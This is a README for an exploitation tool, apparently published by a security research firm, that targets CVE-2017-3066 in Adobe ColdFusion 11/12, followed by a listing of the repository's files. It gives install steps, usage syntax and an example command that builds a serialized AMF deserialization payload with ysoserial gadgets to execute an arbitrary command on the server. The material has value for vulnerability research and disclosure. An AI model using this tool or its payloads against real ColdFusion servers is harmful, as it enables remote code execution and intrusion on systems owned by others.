# ColdFusionPwn
Exploitation Tool for CVE-2017-3066 targeting Adobe ColdFusion 11/12.
## Description
The tool generates serialized AMF payloads that exploit the missing input validation of allowed classes.
For details see our [blog post](https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html).
## Install
Get the latest version of [ysoserial](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar).
Get ColdFusionPwn from [releases](https://github.com/codewhitesec/ColdFusionPwn/releases).
## Usage
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
```
- `[-s|-e]`: Setter (CF11) or Externalizable Exploit (CF11/12) technique
- `[payload type]`: ysoserial gadget payload
- `[command]`: command to be executed
- `[outfile]`: output file for the generated payload
`ColdFusionPwn-0.0.1-SNAPSHOT-all.jar` must be the first entry in the classpath, because the Apache Commons BeanUtils library shipped with ysoserial is newer and has a different `serialVersionUID`.
## Examples
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
```
```
[4.0K] /data/pocs/c0ee6e2a7c9c37f330691ac33eb3040923adf9ef
├── [ 740] DISCLAIMER.md
├── [1.0K] LICENSE
├── [2.9K] pom.xml
├── [1.3K] README.md
└── [4.0K] src
    ├── [4.0K] assembly
    │   └── [1.3K] bin.xml
    └── [4.0K] main
        └── [4.0K] java
            ├── [4.0K] com
            │   └── [4.0K] codewhitesec
            │       └── [4.0K] coldfusionpwn
            │           └── [2.3K] ColdFusionPwner.java
            └── [4.0K] org
                ├── [4.0K] apache
                │   └── [4.0K] axis2
                │       └── [4.0K] util
                │           └── [1.0K] MetaDataEntry.java
                └── [4.0K] jgroups
                    └── [4.0K] blocks
                        └── [ 683] ReplicatedTree.java

13 directories, 8 files
```